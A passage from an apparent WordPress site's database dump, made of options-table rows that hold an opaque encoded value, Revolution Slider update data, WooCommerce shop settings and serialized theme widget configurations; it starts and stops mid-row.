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','no'),(325502,'revslider-uid','e62a5ff46347','yes'),(325705,'revslider-update-check','1704985562','yes'),(325706,'revslider_update_info','O:8:\"stdClass\":0:{}','yes'),(175,'timetable_events_settings','a:3:{s:4:\"slug\";s:6:\"events\";s:14:\"label_singular\";s:5:\"Event\";s:12:\"label_plural\";s:6:\"Events\";}','yes'),(176,'action_scheduler_hybrid_store_demarkation','8','yes'),(177,'schema-ActionScheduler_StoreSchema','3.0.1585602730','yes'),(178,'schema-ActionScheduler_LoggerSchema','2.0.1585602730','yes'),(181,'woocommerce_store_address','','yes'),(182,'woocommerce_store_address_2','','yes'),(183,'woocommerce_store_city','','yes'),(184,'woocommerce_default_country','GB','yes'),(185,'woocommerce_store_postcode','','yes'),(186,'woocommerce_allowed_countries','all','yes'),(187,'woocommerce_all_except_countries','','yes'),(188,'woocommerce_specific_allowed_countries','','yes'),(189,'woocommerce_ship_to_countries','','yes'),(190,'woocommerce_specific_ship_to_countries','','yes'),(191,'woocommerce_default_customer_address','base','yes'),(192,'woocommerce_calc_taxes','no','yes'),(193,'woocommerce_enable_coupons','yes','yes'),(194,'woocommerce_calc_discounts_sequentially','no','no'),(195,'woocommerce_currency','GBP','yes'),(196,'woocommerce_currency_pos','left','yes'),(197,'woocommerce_price_thousand_sep',',','yes'),(198,'woocommerce_price_decimal_sep','.','yes'),(199,'woocommerce_price_num_decimals','2','yes'),(200,'woocommerce_shop_page_id','','yes'),(201,'woocommerce_cart_redirect_after_add','no','yes'),(202,'woocommerce_enable_ajax_add_to_cart','yes','yes'),(203,'woocommerce_placeholder_image','8','yes'),(204,'woocommerce_weight_unit','kg','yes'),(205,'woocommerce_dimension_unit','cm','yes'),(206,'woocommerce_enable_reviews','yes','yes'),(207,'woocommerce_review_rating_verification_label','yes','no'),(208,'woocommerce_review_rating_verification_required','no','no'),(209,'woocommerce_enable_review_rating','yes','yes'),(210,'woocommerce_review_rating_required','yes','no'),(211,'woocommerce_manage_stock','yes','yes'),(212,'woocommerce_hold_stock_minutes','60','no'),(213,'woocommerce_notify_low_stock','yes','no'),(214,'woocommerce_notify_no_stock','yes','no'),(215,'woocommerce_stock_email_recipient','admin@tummyrevolution.co.uk','no'),(216,'woocommerce_notify_low_stock_amount','2','no'),(217,'woocommerce_notify_no_stock_amount','0','yes'),(218,'woocommerce_hide_out_of_stock_items','no','yes'),(219,'woocommerce_stock_format','','yes'),(220,'woocommerce_file_download_method','force','no'),(221,'woocommerce_downloads_require_login','no','no'),(222,'woocommerce_downloads_grant_access_after_payment','yes','no'),(223,'woocommerce_downloads_add_hash_to_filename','yes','yes'),(224,'woocommerce_prices_include_tax','no','yes'),(225,'woocommerce_tax_based_on','shipping','yes'),(226,'woocommerce_shipping_tax_class','inherit','yes'),(227,'woocommerce_tax_round_at_subtotal','no','yes'),(228,'woocommerce_tax_classes','','yes'),(229,'woocommerce_tax_display_shop','excl','yes'),(230,'woocommerce_tax_display_cart','excl','yes'),(231,'woocommerce_price_display_suffix','','yes'),(232,'woocommerce_tax_total_display','itemized','no'),(233,'woocommerce_enable_shipping_calc','yes','no'),(234,'woocommerce_shipping_cost_requires_address','no','yes'),(235,'woocommerce_ship_to_destination','billing','no'),(236,'woocommerce_shipping_debug_mode','no','yes'),(237,'woocommerce_enable_guest_checkout','yes','no'),(238,'woocommerce_enable_checkout_login_reminder','no','no'),(239,'woocommerce_enable_signup_and_login_from_checkout','no','no'),(240,'woocommerce_enable_myaccount_registration','no','no'),(241,'woocommerce_registration_generate_username','yes','no'),(242,'woocommerce_registration_generate_password','yes','no'),(243,'woocommerce_erasure_request_removes_order_data','no','no'),(244,'woocommerce_erasure_request_removes_download_data','no','no'),(245,'woocommerce_allow_bulk_remove_personal_data','no','no'),(246,'woocommerce_registration_privacy_policy_text','Your personal data will be used to support your experience throughout this website, to manage access to your account, and for other purposes described in our [privacy_policy].','yes'),(247,'woocommerce_checkout_privacy_policy_text','Your personal data will be used to process your order, support your experience throughout this website, and for other purposes described in our [privacy_policy].','yes'),(248,'woocommerce_delete_inactive_accounts','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:6:\"months\";}','no'),(249,'woocommerce_trash_pending_orders','','no'),(250,'woocommerce_trash_failed_orders','','no'),(251,'woocommerce_trash_cancelled_orders','','no'),(252,'woocommerce_anonymize_completed_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:6:\"months\";}','no'),(253,'woocommerce_email_from_name','My Blog','no'),(254,'woocommerce_email_from_address','admin@tummyrevolution.co.uk','no'),(255,'woocommerce_email_header_image','','no'),(256,'woocommerce_email_footer_text','{site_title} — Built with {WooCommerce}','no'),(257,'woocommerce_email_base_color','#96588a','no'),(258,'woocommerce_email_background_color','#f7f7f7','no'),(259,'woocommerce_email_body_background_color','#ffffff','no'),(260,'woocommerce_email_text_color','#3c3c3c','no'),(261,'woocommerce_cart_page_id','','no'),(262,'woocommerce_checkout_page_id','','no'),(263,'woocommerce_myaccount_page_id','','no'),(264,'woocommerce_terms_page_id','','no'),(265,'woocommerce_checkout_pay_endpoint','order-pay','yes'),(266,'woocommerce_checkout_order_received_endpoint','order-received','yes'),(267,'woocommerce_myaccount_add_payment_method_endpoint','add-payment-method','yes'),(268,'woocommerce_myaccount_delete_payment_method_endpoint','delete-payment-method','yes'),(269,'woocommerce_myaccount_set_default_payment_method_endpoint','set-default-payment-method','yes'),(270,'woocommerce_myaccount_orders_endpoint','orders','yes'),(271,'woocommerce_myaccount_view_order_endpoint','view-order','yes'),(272,'woocommerce_myaccount_downloads_endpoint','downloads','yes'),(273,'woocommerce_myaccount_edit_account_endpoint','edit-account','yes'),(274,'woocommerce_myaccount_edit_address_endpoint','edit-address','yes'),(275,'woocommerce_myaccount_payment_methods_endpoint','payment-methods','yes'),(276,'woocommerce_myaccount_lost_password_endpoint','lost-password','yes'),(277,'woocommerce_logout_endpoint','customer-logout','yes'),(278,'woocommerce_api_enabled','no','yes'),(279,'woocommerce_allow_tracking','no','no'),(280,'woocommerce_show_marketplace_suggestions','yes','no'),(281,'woocommerce_single_image_width','600','yes'),(282,'woocommerce_thumbnail_image_width','300','yes'),(283,'woocommerce_checkout_highlight_required_fields','yes','yes'),(284,'woocommerce_demo_store','no','no'),(285,'woocommerce_permalinks','a:5:{s:12:\"product_base\";s:8:\"/product\";s:13:\"category_base\";s:16:\"product-category\";s:8:\"tag_base\";s:11:\"product-tag\";s:14:\"attribute_base\";s:0:\"\";s:22:\"use_verbose_page_rules\";b:0;}','yes'),(286,'current_theme_supports_woocommerce','yes','yes'),(287,'woocommerce_queue_flush_rewrite_rules','no','yes'),(290,'default_product_cat','15','yes'),(291,'woocommerce_admin_notices','a:2:{i:0;s:6:\"update\";i:1;s:14:\"template_files\";}','yes'),(153142,'woocommerce_version','4.0.4','yes'),(298,'action_scheduler_lock_async-request-runner','1692884693','yes'),(299,'revslider_update_version','6.6.0','yes'),(300,'woocommerce_maxmind_geolocation_settings','a:1:{s:15:\"database_prefix\";s:32:\"F1nrFPdP3MtLih1uUamWEZGhKW8eIVca\";}','yes'),(302,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(303,'widget_rev-slider-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(304,'widget_qodef_instagram_widget','a:2:{i:2;a:7:{s:5:\"title\";s:0:\"\";s:4:\"type\";s:7:\"gallery\";s:14:\"number_of_cols\";s:1:\"3\";s:16:\"number_of_photos\";s:1:\"6\";s:10:\"image_size\";s:14:\"low_resolution\";s:19:\"space_between_items\";s:5:\"small\";s:14:\"transient_time\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(305,'widget_qodef_twitter_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(306,'widget_timetable_upcoming_events','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(307,'widget_woocommerce_widget_cart','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(308,'widget_woocommerce_layered_nav_filters','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(309,'widget_woocommerce_layered_nav','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(310,'widget_woocommerce_price_filter','a:2:{i:2;a:1:{s:5:\"title\";s:15:\"Filter by price\";}s:12:\"_multiwidget\";i:1;}','yes'),(311,'widget_woocommerce_product_categories','a:2:{i:2;a:8:{s:5:\"title\";s:10:\"Categories\";s:7:\"orderby\";s:4:\"name\";s:8:\"dropdown\";i:0;s:5:\"count\";i:0;s:12:\"hierarchical\";i:1;s:18:\"show_children_only\";i:0;s:10:\"hide_empty\";i:0;s:9:\"max_depth\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(312,'widget_woocommerce_product_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(313,'widget_woocommerce_product_tag_cloud','a:2:{i:2;a:1:{s:5:\"title\";s:12:\"Product tags\";}s:12:\"_multiwidget\";i:1;}','yes'),(314,'widget_woocommerce_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(315,'widget_woocommerce_recently_viewed_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(316,'widget_woocommerce_top_rated_products','a:2:{i:2;a:2:{s:5:\"title\";s:13:\"Popular Items\";s:6:\"number\";i:3;}s:12:\"_multiwidget\";i:1;}','yes'),(317,'widget_woocommerce_recent_reviews','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(318,'widget_woocommerce_rating_filter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(319,'widget_qodef_woocommerce_dropdown_cart','a:3:{i:2;a:1:{s:32:\"woocommerce_dropdown_cart_margin\";s:6:\"0 13px\";}i:3;a:1:{s:32:\"woocommerce_dropdown_cart_margin\";s:17:\"0px 21px 0px 18px\";}s:12:\"_multiwidget\";i:1;}','yes'),(320,'widget_qodef_author_info_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(321,'widget_qodef_blog_list_widget','a:4:{i:2;a:9:{s:12:\"widget_title\";s:15:\"Articles & News\";s:4:\"type\";s:6:\"simple\";s:15:\"number_of_posts\";s:1:\"3\";s:19:\"space_between_items\";s:4:\"tiny\";s:7:\"orderby\";s:4:\"date\";s:5:\"order\";s:4:\"DESC\";s:8:\"category\";s:13:\"articles-news\";s:9:\"title_tag\";s:2:\"h5\";s:15:\"title_transform\";s:0:\"\";}i:4;a:9:{s:12:\"widget_title\";s:12:\"Recent Posts\";s:4:\"type\";s:6:\"simple\";s:15:\"number_of_posts\";s:1:\"3\";s:19:\"space_between_items\";s:4:\"tiny\";s:7:\"orderby\";s:5:\"title\";s:5:\"order\";s:4:\"DESC\";s:8:\"category\";s:6:\"recipe\";s:9:\"title_tag\";s:2:\"h5\";s:15:\"title_transform\";s:0:\"\";}i:5;a:9:{s:12:\"widget_title\";s:15:\"Articles & News\";s:4:\"type\";s:6:\"simple\";s:15:\"number_of_posts\";s:1:\"3\";s:19:\"space_between_items\";s:4:\"tiny\";s:7:\"orderby\";s:4:\"date\";s:5:\"order\";s:4:\"DESC\";s:8:\"category\";s:13:\"articles-news\";s:9:\"title_tag\";s:2:\"h5\";s:15:\"title_transform\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(322,'widget_qodef_button_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(323,'widget_qodef_contact_form_7_widget','a:2:{i:2;a:4:{s:11:\"extra_class\";s:0:\"\";s:12:\"widget_title\";s:0:\"\";s:12:\"contact_form\";s:3:\"159\";s:18:\"contact_form_style\";s:18:\"cf7_custom_style_2\";}s:12:\"_multiwidget\";i:1;}','yes'),(324,'widget_qodef_custom_font_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(325,'widget_qodef_icon_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(326,'widget_qodef_image_gallery_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(327,'widget_qodef_recent_posts','a:2:{i:2;a:3:{s:12:\"widget_title\";s:13:\"Reacent Posts\";s:9:\"post_type\";s:4:\"post\";s:9:\"title_tag\";s:2:\"h3\";}s:12:\"_multiwidget\";i:1;}','yes'),(328,'widget_qodef_search_opener','a:3:{i:2;a:5:{s:16:\"search_icon_size\";s:4:\"19px\";s:17:\"search_icon_color\";s:7:\"#333333\";s:23:\"search_icon_hover_color\";s:7:\"#ffbea5\";s:18:\"search_icon_margin\";s:16:\"0px 26px 5px 0px\";s:10:\"show_label\";s:0:\"\";}i:3;a:5:{s:16:\"search_icon_size\";s:0:\"\";s:17:\"search_icon_color\";s:0:\"\";s:23:\"search_icon_hover_color\";s:7:\"#ffbea5\";s:18:\"search_icon_margin\";s:0:\"\";s:10:\"show_label\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(329,'widget_qodef_search_post_type','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(330,'widget_qodef_separator_widget','a:8:{i:2;a:8:{s:4:\"type\";s:6:\"normal\";s:8:\"position\";s:6:\"center\";s:12:\"border_style\";s:5:\"solid\";s:5:\"color\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thickness\";s:0:\"\";s:10:\"top_margin\";s:3:\"1px\";s:13:\"bottom_margin\";s:0:\"\";}i:3;a:8:{s:4:\"type\";s:6:\"normal\";s:8:\"position\";s:6:\"center\";s:12:\"border_style\";s:5:\"solid\";s:5:\"color\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thickness\";s:0:\"\";s:10:\"top_margin\";s:4:\"-4px\";s:13:\"bottom_margin\";s:0:\"\";}i:5;a:8:{s:4:\"type\";s:6:\"normal\";s:8:\"position\";s:6:\"center\";s:12:\"border_style\";s:5:\"solid\";s:5:\"color\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thickness\";s:0:\"\";s:10:\"top_margin\";s:3:\"0px\";s:13:\"bottom_margin\";s:3:\"1px\";}i:6;a:8:{s:4:\"type\";s:6:\"normal\";s:8:\"position\";s:6:\"center\";s:12:\"border_style\";s:5:\"solid\";s:5:\"color\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thickness\";s:0:\"\";s:10:\"top_margin\";s:0:\"\";s:13:\"bottom_margin\";s:0:\"\";}i:8;a:8:{s:4:\"type\";s:6:\"normal\";s:8:\"position\";s:6:\"center\";s:12:\"border_style\";s:5:\"solid\";s:5:\"color\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thickness\";s:0:\"\";s:10:\"top_margin\";s:5:\"-11px\";s:13:\"bottom_margin\";s:0:\"\";}i:9;a:8:{s:4:\"type\";s:6:\"normal\";s:8:\"position\";s:6:\"center\";s:12:\"border_style\";s:5:\"solid\";s:5:\"color\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thickness\";s:0:\"\";s:10:\"top_margin\";s:3:\"0px\";s:13:\"bottom_margin\";s:0:\"\";}i:11;a:8:{s:4:\"type\";s:6:\"normal\";s:8:\"position\";s:6:\"center\";s:12:\"border_style\";s:5:\"solid\";s:5:\"color\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thickness\";s:0:\"\";s:10:\"top_margin\";s:1:\"0\";s:13:\"bottom_margin\";s:3:\"5px\";}s:12:\"_multiwidget\";i:1;}','yes'),(331,'widget_qodef_side_area_opener','a:3:{i:2;a:4:{s:10:\"icon_color\";s:0:\"\";s:16:\"icon_hover_color\";s:0:\"\";s:13:\"widget_margin\";s:14:\"4px 0px 0 16px\";s:12:\"widget_title\";s:0:\"\";}i:3;a:4:{s:10:\"icon_color\";s:0:\"\";s:16:\"icon_hover_color\";s:0:\"\";s:13:\"widget_margin\";s:9:\"0 0 5px 0\";s:12:\"widget_title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(332,'widget_qodef_social_icon_widget','a:13:{i:2;a:11:{s:9:\"icon_pack\";s:12:\"font_elegant\";s:7:\"fa_icon\";s:0:\"\";s:7:\"fe_icon\";s:12:\"social_vimeo\";s:8:\"ion_icon\";s:0:\"\";s:16:\"simple_line_icon\";s:0:\"\";s:4:\"link\";s:20:\"http://www.vimeo.com\";s:6:\"target\";s:6:\"_blank\";s:9:\"icon_size\";s:0:\"\";s:5:\"color\";s:0:\"\";s:11:\"hover_color\";s:0:\"\";s:6:\"margin\";s:15:\"0px 0px 0px 8px\";}i:3;a:11:{s:9:\"icon_pack\";s:12:\"font_elegant\";s:7:\"fa_icon\";s:0:\"\";s:7:\"fe_icon\";s:23:\"social_instagram_square\";s:8:\"ion_icon\";s:0:\"\";s:16:\"simple_line_icon\";s:0:\"\";s:4:\"link\";s:24:\"http://www.instagram.com\";s:6:\"target\";s:6:\"_blank\";s:9:\"icon_size\";s:0:\"\";s:5:\"color\";s:0:\"\";s:11:\"hover_color\";s:0:\"\";s:6:\"margin\";s:16:\"0px 0px 0px 